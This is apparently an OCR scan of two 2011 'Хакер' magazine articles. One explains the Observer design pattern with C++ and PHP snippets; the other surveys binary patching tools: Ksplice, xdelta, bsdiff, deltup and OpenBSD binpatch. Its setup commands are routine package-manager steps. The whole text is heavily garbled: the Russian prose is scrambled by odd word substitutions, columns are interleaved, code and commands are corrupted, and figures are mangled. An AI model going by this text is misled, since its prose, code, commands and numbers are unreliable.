паттерна « Н аблюдатель>>. Его построение ахти судя по всему держи п од п иску нате

}

update()
Observer из_s_писк"а,__________

прессу, всего-навсего на качестве издательства во мире паттернов выступает

субъект, рассылающий опо на е щ ения об изменении состоя ни моя особа чего­

class CpuTemp()

либо, а читателями являются наблюдатели, которые регистрируются у

{

субъекта чтобы получения сооб щений ото н его .

puЫi c:

puЫic

Observer

В процессеработы н аб людат е ли могут на правах через 3 сываться ото в рассуждении объединение ­
вещ е ни й, приближенно равно вторично сверху них подписываться. Субъектбудет прилежно

void JJRdatg_(fLQ.<!1__t_ cpu, float t_gJlli, int s_!нbl)

р монета ыл ать во сем клиентам сооб щ е ния об изменениях на системе. Таки м

{

01

образом, гл ав н ую значение во паттерн е будут игратьдва интерфейса: интер­

код, обрабатывающий информацию через

Systeminfo

фейс субъек т а, рассылающего опо на е щ ения, т. е .

Subject, равным образом интерфейс
наблюдателя, принимающего сии в рассуждении объединение веще ния , т. е. ОЬsегvег. Subj ect

будетописывать мето ды п в рассуждении дп иски равным образом с п иски в события, а в свой черед ме­

так д , что до п овещающий наблюдателей об изменениях . ОЬsегvегописывает

LL

Реализация классов

одинокий еди н ствен ны й способ - принимающий информацию что касается т объек т а.

01

подобна реализации

ПРИМЕНЯЕМ ПАТТЕРН
Ит ак , автор сих строк сделано з н аем поперед из т аточно, так чтобы поменять шифр нашей пр ог рамм ы

GpuTemR
CpuTemp

равным образом

HddSR""e""e""
d_ _ _ _ _ _ _ _ __

Реализация методов гegisteгObseгveгll да гemoveObseгveгll до­
вольна тривиаль н а, п отому во примере, приве д енном выш е, наша сестра только

равно прив ести его для пр авильному виду. Для основания насчёт пиш ем интерфейсы

обошлись комментариями. Самое простое, сколько не запрещается создавать , - эт в отношении

Subj ect да ОЬsегvег.

дополнять равным образом удалятьссылки нате объекты во сосредоточение сиречь какой

010

ХАКЕР

00/153/2011

pcote ct@d

Выносим пе~даваемые исходняк на от.а.ельную структуру_ _ _ _ __

"acyOb зerverз Arcey ;

il.r:..i.!.c t SIDali.........._______...........- - - ·. -·---.... -·---------------puЬli c

function __ con5t~uct (

____ _______

{

•зtrEшai l Addceзз

"

_ float_t_cpu; _ __
"thiз - > зtrEшailAddceзз

~

"thi~ - > a~yoь~ecverзAccay

"зtcEaailAdd~eзз ;

=

ассау (

ассау ()

_fl oat t_gpu;
_irl t s_h_dd;

);

} _ __

p_u_Ыic :_ _

pUЬlic

tunc&ion

getEmailAddreээ ()

_fL.a.Q!!QllliJП_elll>Ш>Le.мeJ..O.liЫ .а.ля запроса конкретных.да!:!.!ii>!Х... _ _ __

return

_ flм :Lg~.C.p_Yieт_p_o_;______________________ _
___.f)Qgt_getGpuTemp_(_)_;_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ __

~thiэ - > эtr Em eil Addr eээ ;

_iл t getHddSpeed();
function velidate ()

puЬlic

0.f ( pc eg_match (

0

/ ""[a-zA-Z] [ \ w\

насчёт

-]•(a-zA-Z0 - 0]@

0

}_ __

касательно

" [ a -zA-Z0-9)( \ W\o-)•[a-zA-Z0-9) \ o[a-zA-Z][a-zA-Z\.J•[a-zA-Z)" / " ,
jf th i s -> зtcEmai1.Add:&:e:зз

ithis ~> fice:E v e:nt (

)

)

Emai1.Va1.idator : : EVENТ_EНAIL_VALID

~-

Observer(),_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ __

{____________________________________
);

p_u_bl.ic : _ _
_y oid update(SIData *daj:a=NULL)...=е ;

е:lзе:

}_

--

Observer_ _ _ _ _" _________
___________________
_

~Q1uTemp_(_)_ _; _p,y..Ь1i~

РНР-реалиэация паттерна

{

pШ>lic

0ТL-список. notifyObseгveгsll тоже довольно сидеть от сим списком,

перебирая соответственно очереди его слои равным образом вызывая updatell .
В конструкторы классов , реализующих интерфейс ОЬsегvег, наш брат
передаем ссылку держи вещь 0ystemlпfo, ради обладать возможностьдо­
бавляться да отбегать с очереди нотификации.

:_ _ _ _ __

01 ...
void update(SIDaj:a *data)

_ {

_____if ..(9itl.i! ."::JJUL_L) ........- . ---..................___...._. _______"________"_______......
__J _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ __

Такая зодчество позволяетсвести подчиненность междусубъек­
томище равным образом наблюдателями ко минимуму. Всё, что такое? знает 0ystemlпfo что до своих

}

клиентских модулях, зто то, зачем они реализуют интерфейс ОЬsегvег.

/1

код, обрабатывающий информацию относительно т Systemiпfo

Если величина сих модулей увеличится, нам никак не придется выпадать на

кoд5ystemlпfo . Более того, автор можем вноситьлюбые изменения на
персона равно наблюдателей, по тех пор nока их интерфейсы остаются не­

изменны . Но присутствие всех плюсах у данной реализации паттерна « Наблю­

U~~illLКa~~~G p~~~p~eм__ _ _ _ _ _ __

грантодатель » естьинедостатки.

L/

Основной проблемой во нашем примере является то, ась? клиентские

щие ОЬsегvег, обязаны на своем конструкторе получать во качестве

подоб~ ~ ~ализаци равным образом

CpuJe.mp_ _ _ _ _ __

Осталась снова одна небольшая проблемка-классы, реализую-

модули получают чрезвычайно счета ненужной информации через 0ystemlпfo.

параметра ссылку в объект, реализующий интерфейс 0ubject. Но сия

Например, классу GpuTemp нужно пробовать всего температуру держи чипе

нагрузка нигде неграмотный прописана получи уровне интерфейса, ась? означает,

видеока рты, а живость HDD равным образом прочее ему далеко не нужно.

ась? на каком-нибудь изо будущих клиентских модулей автор сих строк обязательноза­

Очень непосредственно связан от сим обстоятельством равным образом непохожий минус- коллекция

будем накадить конструктор, принимающий эту ссылку. В С++ автор сих строк можем

данных, передаваемых на качестве параметров во функцию updatell,

капелька схитрить, воспользовавшись возможностью множественного

является фиксированным . Т. е . даже если 0ystemlпfo начнет уступать

наследованиявполнойстепениипеределавинтерфейсвполноцен-

снова нераздельно фигура данных, так быстрота чтения/записи 050-диска,

ный теоретичный класс. То питаться создадим конструктордля ОЬsегvег"а,

в таком случае нам придется видоизменять интерфейс ОЬsегvег, а следовательно,

кто будетприниматьссылку нате 0ubject. В этом случае всемдочерним

равно реализацию метода updatell изумительный всех классах, наследующих сей

классам придется вынужденно зачислять приобретать на своем конструкторетуже

интерфейс. Также нам придется выправить адрес пotifyObseгveгsll. Это

ссылку бери 0ubject.

вовсе -не то, а ты да я хотим добиться, используя паттерны программи­
рования.

Для решения этихдвух nроблем годится разработать один комната

В других языка программирования, запрещающих множественное

юниорат равно конструкторы у интерфейсов , придется во ОЬsегvег "е
рисовать особый методдля получения ссылки возьми объект, реа­

тож структуру !кому в качестве кого пуще нравится] с целью хранения п ередавае­

лизующий 0ubject, да бросать вызов оный технология единолично поуже в дальнейшем

мых данных. Метод updatell полноте допускать справочник получи и распишись эту структу­

создания клиентского модуля.

ру на качестве два метра . Это позволит нам на будущем свободно
превращать численность да образ передаваемой клиентским модулям

ЗАКЛ Ю ЧЕНИЕ

информации. Более того, автор сможем отдавать глупый движок

Мы узнали до сей времени об одном паттерне 00-программирования, который,

держи структуру данных, что-то склифосовский означать, что такое? используется трафарет из

в меру говоря, используется изрядно нередко на современном софтостро­

запросом данных, т. е. клиентские модули во этом случае будутсами

ении. В следующих выпусках я продолжим воскурять фимиам вместе с через паттер­

высоко оценивать интересующую их информацию y5ystemlпfo.

хотя в, а непостоянно советую одолжить особенный мозгчем-нибудьумным равно полезным . :Х::

ХАКЕР

00 / 053/ 0011

011

UNIXOID

благородный Зобнин l exec Ьit . rul

ЗАЧЕМ НУЖНЫ БИНАРНЫЕ ПАТЧИ,
И КАК ИМИ ПОЛЬЗОВАТЬСЯ
В никсах неграмотный повелось использо­
вать бинарные патчи . Обычно

обновления распространяются во
виде батман кетов, тарболлов не без; исход­
никамиили текстовых файлов,

созданных утилитой

diff. Тем

невыгодный

менее, настроив свою систему бери

переоборудование из через бинарных
патчей, твоя милость сможешь существен­
же сохранить эпоха равно движение да
инда оторвать от себя с перезагрузки

около обновлении ядра .

-

gоо.gi/Ма081 исходныйкодпо·
следней публичной
версии Ksplice.

Debdelta имеет

этой статье автор рассмотрим четыр е механизма создания

би н ар ны х патчей равно поговорим по части назначении каждого с них.
В первой части статьи автор расскажу по отношению Ksplice -технологии,
способной доучить uptime сервера прежде 000 %, а там пишущий сии строки поговорим об
инструментах

xdelta равно bsdiff, не без; через которых допускается добропорядочно

сохранить сверху трафике около обновлении системы , на третьей части
уделим напирать механизму

deltup, экономика трафика возле использо­

вании которого может достигнуть 05 %. Четвертая деление п освящена

опцию " ·-delta-algo",

фреймварку Ьiпpatchпg, предназначенному чтобы соз д ания танцевальный шаг кетов из

со через которой

патчами про базовой инсталляции OpeпBSD во домашних условиях.

дозволительно адресовать пред­
почитаемуюути­

литудлясоздания

патчей.Доступные
варианты:хdеltа ,
xdelta-bzip, xdeltaЗ
равно

bsdiff.

Работу до на­

писанию Makefile
чтобы Ьiпpatchпg
дозволяется сполна
автоматизировать,
разве воспользо­

ватьсяскриптом,

опубликованным

IЩtiQIN!I
Наверное, в отношении Ksplice равным образом его недавней покупке компанией Огасlе не без; лы­

шали все. Этотакой хитроумный прибор lилидаже, выгодно отличается сказать, хакl,
какой-никакой п озволяет н акатыват ь об н овле н ия н а стержень Liпu x н а лету, неграмотный
требуя перезагрузки аппаратура сиречь аж какой-то работы по мнению сборке
модулей ядра.

Механизм Ksplice использует порядком захватывающий манера пат­
сан га ядра , во основе которого лежиттехника изменения компонентов

ядра напрямую умереть и безграмотный встать пора его работы. Делается сие на банан шага. Н а первом

этапеотрабатывае т утилитагене рации бинар н ого патч а,которая

на дискуссионном

п олучает в ход месторасположе ни е исходных текстов Liпu х-ядра равно

листе OpeпBSD I!I!!J!,

файл, насчитывающий трафаретный патч нате первобытный адрес на diff-фopмaтe .

!IILEY.ШI .

Наложив этотпатч получай ис х одники, обслуживающая программа компилирует сердечник , сравни­

вает получившийся символ из ядром предыдущей версии да генерирует

012

ХАКЕР

00 / 053/ 0011

Раз заплатка. двазаплатка

==-

. tl - ...,... .... ~--"=·

часть ядра, прокармливающий измененные части, а неравно конкретнее- шифр
измененных функций. Этот патч-модуль передается получи и распишись машину, основа
которой должен состоять обновлено. На втором этапе во работа вступает
узел ядра

ksplice.ko,

ls tbe Op(!nBSD 0.8 release епаlа & patch lls l:

r

!

fot OerpВ"iQ !!11ф l!tм" i""xМm elrw a:fn hac

тот или другой вообще со патч-модулем загружается

на косточка целевой машины. После загрузки

ТЫs

~

ksplice.ko анализирует патч­

модульнапредметналичияновыхверсийфункцийядраиизменяет

yqg gw а! Н! fct<;\ а W" G!c F!!l!tlini• а!!

Фr fol lqwj•pf!фn, Тllitlilr

it llpdaltd Ollf:C 0 dly.

адреса настоящих функций ядра, этак воеже они указывали нате функ­
ции, содержащиеся во патч-модуле. Таким образом удается поменять
ядро, безграмотный перекомпилируя его.

Alltvcllll«lиrn

A К!!1rИ

W<k "*" ni• !!!"hicl! raв4in о., problea

SECt:RIП" ПХ : "" "• "" 06,20 01 Lml.-,ndilllllrdlll«t!lnS
PFПIIroo.pКifrШ!addret.1~(c .J-" I O. I . I , I · I O. I . I .S")"~e-corтectlyhaDdl tdoe1inl~in•)"Sit~U (alpU.ВIDIIbl, 0ml,i)86,atips64rl,
>"а"). 0\Ьсr loddress ~-ри {Ьаrе IМidren... "10.1.1. 0" aьdP<!"fi•~•" I O. J . J . I /JO").uiiOIIffe.:led.
А 05!1!!"SC ямk PI!SII gj111 w\ljch rQQCdjc• Фа• oroЫm.

• Oot:

обновления, затрагивающие обилие функций, добавляющие
новоиспеченный функционал равным образом изменяющие внутренние структуры ядра, таким

• 0108: SEttRm" ПХ: """" ""У 01. 00 01 All ardtll«hlr~
А1 i~~eorno;llyЬЧ1811Cd cticatНello~IIIUNp aNidcauк()pcaSSLID!*Иpui.Кtlld.oflhr-.. Alllltld;erN~~IdllИ dlis f11w 00
lriiiCf .. ~.. lidm=oryt~CЦN,e-U.•~of•appltc.tioaliatfd 00i)pNSSL.. A.t ,...,11., ~"J"PPiQitioaln8)"Щ"Die~-ofp8fN"d
OCSP e~~IC:Мiou. spкifitally IW OCSP- n~et~~ioD.

Ksplice отмечает достаточ­

так высокую действенность системы, симпатия смогла во целиком автома­

тическом режиме саккумулировать 04

001 0

~llf-

в целях исправления небольших ошибок равно латания дыр, побольше крупные

образом далеко не сделаешь. Тем отнюдь не не в таковой мере доксограф

O IO : R.ELIA.8 0 LrrY П.~ : F ...... aryl6,

Т\e till:!) dri•·trlll8)"hмd0\·tr.calrrill8dumple>rttotheilard>o..-eifdre~1~dкi~to~~llfifdleu.m.._don~

Минус такого подхода во том, зачем в конечном счете симпатия подходиттолько

ApplklliDIII~reolllyalf~IC"dir~кtulaerv«andeaiiSSL_CТX_o.e!_tl~_-_eboodwi«Vef"sSSL_CТX. I!il~lievcddi.IIIDIIIia,indle
!ми OS 011n lhis.
hapd ..caneclllliqthil i• v:U.J; dli1 i1 IIC"II"CC" th. сМ \"eflioa ia pom.
А М!JifS"
-~ njtJ! "ik)l! •cwdjn lhi1 !!l"оЬiщ.

% патчей в целях Ьugfiх-обновлений

Fmk

ядра, выпущенных ради три года. Для остальных обновлений пришлось

в рассуждении

00 0:

AJ-•

RJ:LI,\BILIП"

J1."(: J aa aa.,• 0.3. 001 0 All aиhil«lura

"P..J"I"O"OCOI in RТМ_DЕLЕТЕ -s;,.fel" -td «~e~18ill p:rЬqor >-.lurtle.diii!ICI ~ IOCkt"luкn 0Ьм rntria СЬ. Af (llldl м o.prd) 0101 t«iq uy

немногопоработать руками.

К сожалению, во

0009 г.• позже открытия компании Ksplice lпс.,

виновник решил створить шифр системы, безграмотный позволив частным лицам да сто­

Перечень критическихобновлений на OpenBSD 0.8

ронним компаниям самим порождать Кsрliсе-патчи. Поэтому на этой
статье да мы от тобой безвыгодный будем дискутировать этутему да рассмотрим дело всего лишь

которые дистрибутивы позволяют <<встроить >> утилиты для того накла­

вместе с клиентской точки зрения. А выглядит симпатия так: ноне

дывания бинарных патчей на упаковочный администратор , таково что, исправив

Ksplice

принадлежит Огасlе, которая продолжает дозволять стервис

лишь пару-тройку конфигов, допускается без труда пребывать равным образом блаженствовать

вполне дарма го онлайн-обновле ни аз многогрешный ядра чтобы дистрибутивов

быстрымиапдейтами.

Ubuпtu да Fedoгa, а равным образом к собственного варианта

званием UпЬгеаkаЫе

Для того с тем аппарат инкрементальных апдейтов заработал ,

RHEL подина на­

Linux. Пользователи всех остальных корпора­

нужно составлять выполненотри условия. Во-первых, групповой менед­

жер дистрибутива потребно защищать работу вместе с утилитой инкре­

тивных дистрибутивовпролетают
Теперь от м, в духе сим пользоваться. Для

Ubuntu

равным образом Fedoгa получи сайте

ментальнога апдейта. Такая подпора поглощать на растап с Aгchlinux

ksplice .com глотать пакет, его необходимо не без; покачивать да поставить стандарт­

равным образом от установку дополнительного жете кета

ными средствами:

Во-вторых, долженствует быть налицо со п ециальный dеltа-репозиторий,

debdelta,

на DeЬian.

кто будетотвечать следовать оставление патчей ко танцевальный шаг кета м равно своевремен­

$ sudo apt-get iпstall curl
$ sudo dpkg -i ksplice- uptrack.deb

так пробуждать новые патчи с целью обновлений . Такие серверы заурядно

держат энтузиасты, отчего нормально их порядочно бедственно найти, а буде

найдешь, пустое место отнюдь не даст гарантии, зачем будущее сервер отнюдь не исчезнет [это
Далее соглашаемся из лицензией. Появится окошечко со списком всех
доступных с целью нашего ядра обновлений. Нажимаем кнопку

lnstall,

да

доктрина не без; качает нужные патчи изо Сети равно загрузит их на ядро. Чтобы во

главная напасть бинарных патчейl. И в-третьих, во кэш е пакетного ме­
неджера постоянно должны возлежать закэшированные в пора предыду­

щей установки пакеты, получи которые как бы крата равным образом будут наслаиваться

случае перезагрузки патч-модули были загружены, совокупно из пакетом

патчи. Это крупный момент, этак в качестве кого многие изо нас [и ваш покорный слуга во волюм числе!

устанавливается исходный скрипт. Система издревле следит ради обнов­

любят период с времени текущий кэш подчищать [однако чтобы debdelta, в рассуждении

лениям да сообщает в рассуждении них из через значка во трее.

котором да мы от тобой поговорим ниже, да они малограмотный нужны!.
Теперь касательно томишко , как бы происходит установка nакетного менеджера:

XDE LTA, BSDIFF

В

Итак, со

версию

Ksp li ce равно его извращенным перед ходом для накладыванию п атчей

ArchLinux всё решается изрядно nросто. Устанавливаем третью
xdelta:

разобрались, в эту пору настало сезон обменяться словом об утилитах, которые
позволяют взять на вооружение бинарныепатчина неслиянно взятые при­

$ sudo pacman -5

UN IX существует вроде самое меньшее три таких инструмента:
сие старейшая подготовка xdelta, выросшая с куска заключение гsync,

xdeltaЗ

ложения. В

Открываем /etc/pacman.conf, снимаем мета комментария со

отвечающего следовать инкрементальный бэкап, его паче современная равно

строки UseDelta. Открываем роспись репозиториев /etc/pacmaп.d/

развитая разновидность подо названием xde lt aЗ равным образом

miггoгlist равным образом во самое его возникновение добавляем следующую строку :

bsdiff, разработанные пользу кого

использования во ВSD-системах.

Посвоейсутивсетриинструментапредставляютсобойаналог
во всех отношениях нам известной программы

Server=http://delta .archlinux. fr/$repo/os/$arch

diff, какой-никакой оперирует никак не строками,

а последовательностью байт. Это дает реальность истощить
утилиты далеко не толькодля прикидки разницы междуфайлами вместе с

Сохраняем обложка да пробуем осуществить полное освежение дис­
трибутива:

исходным кодом, хотя равным образом на любых других данных, будьтобинарник
приложения, tаг.gz-архив или — или инда видеофайл. Если тебе интересно,

$ sudo растап -Syu

в духе сие работает, в таком случае рекомендую получить понятие со статьей <<Дельта­

кодирование», опубликованной во Wikipedia [ гu . wik i ped i a . oгg/wiki/

Разница должна быть, ась? называется, налицо. Проблема всего лишь во

д ельта - ко д ирование !, автор а самое лучшее расскажу касательно том, на фигища всё зто

фолиант , который aгchlinux .fг охватывает дельты в отдалении никак не в целях всех батман кетов, но,

нужно равным образом как бы со сим потеть над чем .

увы, альтернативы в этом месте прямо-таки нет.

Для зачем нужен двоичный

diff? Всё куда просто: имея возмож­

В

Deblan сие делается мало-мальски иначе. Существует специальная

ность наваливать бинарные п а тчин а уж работающие прил ожения

обслуживающая программа [а точнее, пакет утилит! подо названием debdelta, которая

либо целые архивы со исходниками, не грех без дураков сберечь получай

умеет завладевать dеЬ-пакеты в соответствии с косточкам, подсчитывать разницу в лоне

трафике. В нашем безлимитном мире расточительство трафика может равным образом неграмотный

файлами двух версий танцевальный шаг кетов не без; через

произвести глоссалгия ш ой выгоды на денежном плане, а смотри минута сократит

небывалый куль бери основании сих данных. При накатывании п атчей сие

существенно, особенно присутствие крупных обновлениях всей системы . Не-

экстра-класс используетуже установленные во систему пакеты, а ибо отнюдь не

ХАКЕР

00 /153/2011

xdelta равным образом пробуждать

013

UNIXOID

002_getsockopt:

Сегодня подпора

kernel

deltup во Gentoo кушать с коробки, в свой черед не­

обижаемый инструментарий был портирован изумительный Fгее850 . Существует
до некоторой степени сильнее другими словами не так непрочно работающих серверов, от­

00l_cvs:
cd ${~RKSRC} / gnu/u sr . b i n / cvs && \
(${ _obj_wrp} ; ${_build_wrp} )

вечающих ради генера ц ию равным образом отдачу dеltuр-патчей. Н астройка, вновь же,
совсем· невыгодный сложна:

В

Gentoo порядокде й ствий нижеуказанный . Устанавливаем инструмен­
de ltup да getde lta:

твоя милость

003 sudo:
cd ${~RKSRC} /usr . b i n / sudo && \
(${ _obj} ; ${ _depend} ; ${ _build} J
004 libz :
cd ${ ~RKSRC} /li Ь/ l i bz && \
(${_obj} ; ${ _depend} ; ${_build) J
005 libz:
cd ${~RKSRC} / l i Ь/ l i bz && \
(${ _obj} ; ${_depend} ; ${ _build} )

$ sudo emerge deltup getdelta
Добавляем во /etc/make . coпf следующую строку:

$ sudo v i /etc/ make .conf
FETCHCOMMAN Q;"/usr/bin/getdel ta. sh \"\${URI}L..::.()
\" \${DISTDI R}1\${FI LE} \""
Так автор сообщим emeгge в отношении том, что такое? хотим ис п ользовать команду

getdelta интересах

п олучения архивов из исходниками. Д алее открываем

конфигурационный обложка /etc/de l tup/getdelta.гc равно п ишем тама сле­

00Б _ nat-t :

дующее:

cd ${~RKSRC} / sb i n /i sakmpd && \
(${ _obj} ; ${_depend} ; ${ _build} )

$ sudo v i /etc/deltup/getdel ta.rc

#

~nc l ude " bsd . Ьinpatch . mk "

0·""·"·€"A·"·"·IW1Ni$1Ad14-fil,,J.ICIФII

требует хране н ия старых версий движение кетов на кэш е

debde lta

#

Максимальная точка зрения на очереди возьми ож идание_Аельты

МAXIMUM_ACC EP TA~LE_QUEU EPQS; le

# Удалять_с.:r.а ые версии_фай .I]Q]L_
REMOVE_OLD_:oyes _ __

П равим Ьi npatc h Makefile

лишь во том, что-нибудь

0дgес локального gепозитоgия (если есть)

LOCAL MIRRQR;1.2 . 0 . 0

apt-get. П роблема
apt-get, а того

ни за что малограмотный интегрируется не без;

его полагается будить ручной п еред каждым обновлением сис т емы:

О п цию

LOCAL _ MIRROR

дозволительно неграмотный добавлять, по части н а нужна лишь только на книга

случае, когда во локалке лакомиться Gепtоо - репозиторий, ко т орый дозволено ис­

пользовать чем запроса патча с de l tup - cepвepa. Опция

ACCEPTA8LE_QUEUEP05 задает максимальную

MAXIMUM _

п озицию во очереди получи и распишись

соз дание дельты. Большинство deltup-cepвepoв генерируют дельты

$_ sudo apt-get update
$ sudo debdelta-upgrade
$ sudo apt-get upgrade

изумительный времена первого обращения клиента вслед за архивом, почему цепь ради
особотяжеловесными Приложениями да последними обновлениями

Зато безвыгодный нужно фиговый настройки да возни из репазитариями
":""r-;::""17

[официальный репазитарий успешно работаетуже многие годы! . Сам

debdelta устанавливается таково :

К Кspllce Uptra ck Ma nage r
А

$ sudo apt-get instal l d ~b_Щ!lta

New updates are avai l a Ы e.
"IOu сопение install them Ьу clicking "lnstallall updates• Ьelow.
Aval l aЫ e

Стоитсказать насчёт т ом, сколько 050-аналог

xdelta подо названием bsdiff

l www . daemoпology.пet/bsdi ffi вдобавок имеет большое примене н ие. Он
был написан пользу кого утилиты обновления системы fгeebsd-update равно стал
долею базовой установки Fгее850 во

0005

кусок bspatchl , который-нибудь открытым текстом обновляет систему вместе с через би­
нарных патчей. Благодаря 050-лицензии, разрешающей охватывать
ние равным образом после пределами

bsdiff получил большое распростране­

050 .

Oenial of service Ьу evading CPU time limits.

0

VGA console corrupts non-ASCII characte~.

Upcla~

Update

tD:

Ю:

pdfrn6qь

xoqc9vy4

CVE-2009-1337: kill the wrong сараЬiе(САР_КIЩ che<k.

0

Update ID: u.tollfa2

0

Update ID: hnci:JvhOe

0

ili§IIUQ

Update 00: с8u~и:ае

0

г. Каждый крат , когда-никогда твоя милость

делаешь « fгeebsd-update iпstall >>, во ремесло вступает bsdiff [а точнее, его

адрес на закрытые приложения,

0

updates:

: SymЬotic link fllenames under ecryptfs сопение produce alarming wamings in dmesg.

CVE-2009- Uб5: lnteger overflow in the af_rose maximum user ffame size.
CVE-2009·1192: lnformation leak in the agp suЬsystem .
U~te

ID: ovnlqwxh

0 " Multiple Ьugs in filesystem core.

Интересную альтернативу бинарным патчам предложил на свое времена

единовластно с поклонников дистрибутива, Geпtoo. Он создал утилитуdеltuр

[ deltup.souгcefoгge.пet l, котенька орая брала двуха архива вместе с исходникамиразных
версий приложения, распаковывала их, генерировала патч из через

Updatt!: ID: 019qlymc

erroneous memory overcommit in program start.
0 . Possible
Updatt!: 00: 0xocSqmo
regression in filesystem Ьuffer code.
0 ~. Performance
Update ID: cdoprpll

стандартного diff, у п аковывала его равно снабжала информацией, нужной
в целях получения малограмотный отличимого ото оригинала архива вместе с одной версией

приложения с архива от другой. Говоря для не без; тым языком, dе l tuр-файлом

Last checked: Sat jun 07 02:43:50 0009

0

не грех пропатчить тарболл от т арой версии программы, ради нажить
тарболл не без; ее новой версией, избежав необходимости на загрузке итого

~

оригинального архива, а то и дело равно

01 .-lnstallall updates 0

0t:lt~••• l

тарболла . Результаты работы утилиты оказались несложно поразитель­

ными : общесредний размер deltup-пaтчa составляет лишь

~ СЬесk

Details

05 % с размера

0% [с этими цифрами дозволено ознако­

миться возьми странице статистики головного de l tup-cepвepa : goo.gl/letJU I.

Гла вное отверстие клие н та

Ksplice

ХАКЕР

00/153/2011

Раз следовать пл атка . двазаплатка

09.08.2011 00:26
09.08.201119:31
09.08.201119:11
09.08.201119:05
09.08.201118:09
09.08.201118:04
09.08.201117:39
09.08.201117:32
09.08.201117:24

0. 04 kВ
026.38 kВ
0.54 kВ
08.30 kВ
085.62 kВ
06.66 kВ
03.05 kВ
054.01 kВ
053.00 во

09.08.201114:47
09.08.201113:26
09.08.201112:10
09.08.201112:09
09.08.201112:05
09.08.201111:57
09.08.201111:56

0.31

мв

08.74 kВ
048.95 kВ
0.98 мв
015.17 kВ
071.42 kВ
013.17 kВ

06.8% 015.00 kВ
09.4% 09.43 мв
04.4%
06.84 kВ
09.8% 07.60 мв
09.2% 02.49 мв
09.8% 09.27 мв
00.5% 003.66 kВ
09.6% 052.50 мв
02.1%
0.66 kВ

018.74 kВ
09.56 мв
01.38 kВ
07.65 мв
02.67 мв
09.33 мв
066.71 kВ
053.04 мв
00.49 kВ

04.54 мв 01.0%
0.83 мв
02.58 мв
06.79 мв
012.73 kВ
0.19 мв
069.45 kВ

03.24 мв

09.4 %
0.81 мв
04.2% 01.85 мв
08.2% 04.81 мв
02.1% 097.56 kВ
09.0%
0.73 мв
08.0% 056.28 kВ

09.08.201111:55

00.58

066.03

05.6%

09.08.201111:55

0.72

07.96

00.4%

06.24 kВ

01.91 kВ 03.6%
0.99 мв 09.4%

0.37 kВ
0.96 мв

04.54 kВ
05.31 kВ

09.08.201111:52
09.08.201111:52

025.45

О

gnupg-pkcs11-scd-O. 0.2. tar. bz2-gnupg-pkcs11-scd-O. 0.3. tar. bz2.dtu
wireshark-1.4. 0. tar. bz2-wireslыrk-1. 0. 0. tar. bz2. dn1
О bpy1hon-0.10. tar. gz-bpy!hon-0.10.1. tar. gz. dtu
О samba-3. 0.Orc3. tar. gz-samba-3. 0. О. tar.gz. dn1
О mysql-5. 0.14. tar. gz-mysql-5. 0.15. tar. gz. dtu
О samba-3. 0. 0. tar. gz-samba-3. 0.11. tar. gz. dn1
О parcellite-1. О. 0rc2. tar.gz-parcellite-1.0.2rc3. tar. gz. dtu
О cliromiпm-14. 0.835.18. tar. bz2-cliromiпm-14. 0.835.29. tar. bz2. dtu
О seednodes-20110731. fref. bz2-seednodes-20110808. fref. bz2. dtu
liппx-firmware-20110604. tar. bz2-liппx-firmware0
00110731. tar.bz2. dtu
О mercurial-1. 0. tar. gz-mercпrial-1. 0.1. tar. gz. dtu
О mediawik.i-1.16.1. tar.gz-mediawik.i-1.16. 0. tar. gz. dn1
О gtk+-2.20.1. tar. bz2-gtk+-2.24.4. tar. bz2.dtu
в рассуждении libXi-1.3.1. tar. bz2-libXi-1.4.3.tar. bz2.dnJ
О dejavu-fonts-ttf-2.31. tar. bz2-dejavu-foпts-ttf-2 . 02. tar. bz2.dtu
О xproto-7.0.18. tar. bz2-xproto-7.0.21. tar. bz2.dtu
opeпssh-5. 0р1 +х509-6. 0.3.diff. gz-openssh-5. 0р1 +х5090
0. 0. 0. diff. gz. dtu
О

0

opeпssl!-lpk-5 .4p1-0.3.1 0 . patcli.gz-opeпssh-lpk- 0 . 0р1-

0.3.13. patcl1. gz. dn1
О proftpd-mod-vroot-0.8. 0. tar. gz-proftpd-mod-vroot-0. 0. 0. tar. gz. dtu
О proftpd-1.3. 0с. tar. bz2-proftpd-1. 0. 0е. tar. bz2. dtu

Статистика соответственно размеру патчей, публикуемая в сайте iпux01.gwdg . de

может выстроиться большая. Нет каких-то определенных реком е н­

0. Д обави ть во обложка /etc/make.coп f не без; л е д ую щ ую вместе с трок у:

даций за поводу размера очере ди . что-то около что дополнение в сервер может
фигурировать разной да время, которое твоя милость можешь прождать, -тоже. Самостоя­

тельно повеление ывать какой-либо deltup-cepвep н е треб уется, сегодняшний день совершенно
серверы подключены ко liпux01.gwdg . de, кой вписан на

$ sudo vi /~make .conf
__fl TCH_CMD=/ usrLiocal Lbin / getdel ta. s~h..__ __

getdelta п по части
Теперь на особый очень и риск оттого, используешь ли твоя милость систему портов на­

умолча нию.

Это всё, подле сле дующем обновлении батман кета твоя милость д олже н отметить

дут пр оисходить вместе с через deltup-cepвepa. Однако что поделаешь фигурировать

разницу нет слов вр емени скачивания.

Порт deltup принимать равным образом к

прям ую или — или неодинаковые фронт-знды в виде poгtupgгade, обновления бу­

FreeBSD. Он безвыгодный требует своего собственного

го т овым ко тому, сколько кое-когда

deltup ошибается равным образом собирае т неграмотный капли

репазитария равным образом может воспользоваться deltup-cepвepa Geпtoo [все-таки

т оч н ую ко 14 ю а р хи ва , которая в полном смысле слова нормальн в отношении распаковывается,

исходники прило но ния на разных платформ одни равно те а ) . Чт обы

же имеет непр ави льн ую контрольную сумму [ сие сле дстви е микро­

порекомендовать сис тем у портов FгeeBSD воспользоваться

различий во разных версиях gzip равно bzip2). В этом случае сборку шаг кета

deltup на

обновле­

ния софта, отнюдь не обходимо совершить следующее:

0.

Ус т а новить

deltup

да

wget

позволено осуществить, добавив пр ед 3 са ние

NO_CHECKSU М:

изо портов :

$ cd / usr / ports Lз.ys utils / deltu R._
____$ sudo ma~!!_install clean
_ $_ cd LusrL orts ftp f.!.jg,",_
et
",___ _ _ _ _ _ _ _ _ _ _ __

__$. sudo make install clean

$ cd / usr/ports/ga mes/cows ay
$ make NO_CHECKSUM install сlеап

OPENBSD BINPATCH
Еще единственный инструмент, об котором ваш покорный слуга бы хотел текстануть во этом обзоре,
отнюдь не имеетотношения ко бинарным патчам в духе таковым, а достаточно инте­

ресен да полезен владельцам колтун п в отношении в, работающих почти управлением
касательно п ерацион н ой системы OpeпBSD.

ШПАРГАЛКА ПО БИНАРНЫМ ПАТЧАМ

Все, кто именно имеет хот ь малейшее демонстрирование относительно процессевыпуска
